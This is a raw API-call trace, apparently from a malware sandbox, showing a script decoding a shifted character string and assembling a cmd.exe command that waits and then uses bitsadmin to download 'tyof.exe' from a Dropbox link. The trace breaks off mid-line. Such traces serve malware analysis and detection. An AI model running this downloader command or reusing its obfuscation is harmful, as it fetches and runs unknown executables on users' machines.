0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0017.146] VarBstrCat (in: bstrLeft=0x0, bstrRight="2", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="6") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2r", bstrRight="6", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2r6", bstrRight="v", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2r6v", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2r6vm", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0017.146] VarBstrCat (in: bstrLeft="2r6vmi", bstrRight="u", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0017.147] VarBstrCat (in: bstrLeft="2r6vmiu", bstrRight="h", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.147] VarBstrCat (in: bstrLeft="2r6vmiuh", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.147] VarBstrCat (in: bstrLeft="2r6vmiuhx", bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.147] VarBstrCat (in: bstrLeft="2r6vmiuhxl", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0017.147] VarBstrCat (in: bstrLeft="2r6vmiuhxl/", bstrRight="1", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b933", bstrRight="2r6vmiuhxl/1", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.147] SafeArrayAllocData (psa=0x7818370) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0017.147] VarBstrCat (in: bstrLeft=0x0, bstrRight="q", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.147] VarBstrCat (in: bstrLeft="q", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.147] VarBstrCat (in: bstrLeft="qe", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0017.147] VarBstrCat (in: bstrLeft="qes", bstrRight="y", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.147] VarBstrCat (in: bstrLeft="qesy", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyo", bstrRight="z", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyoz", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyoza", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyozan", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyozana", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyozanan", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.148] VarBstrCat (in: bstrLeft="qesyozananr", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1", bstrRight="qesyozananri", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.148] SafeArrayAllocData (psa=0x7818370) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0017.148] VarBstrCat (in: bstrLeft=0x0, bstrRight="v", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.149] VarBstrCat (in: bstrLeft="v", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.149] VarBstrCat (in: bstrLeft="vo", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.149] VarBstrCat (in: bstrLeft="vox", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananri", bstrRight="voxi", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.149] SafeArrayAllocData (psa=0x7818370) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.149] VarBstrCat (in: bstrLeft=0x0, bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0017.149] VarBstrCat (in: bstrLeft="t", bstrRight="y", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.149] VarBstrCat (in: bstrLeft="ty", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.149] VarBstrCat (in: bstrLeft="tyo", bstrRight="f", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.149] VarBstrCat (in: bstrLeft="tyof", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.149] VarBstrCat (in: bstrLeft="tyof.", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.e", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.ex", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="?") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe", bstrRight="?", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?d", bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl", bstrRight="=", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl=", bstrRight="1", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl=1", bstrRight=" ", pbstrResult=0x2867c0 | out: 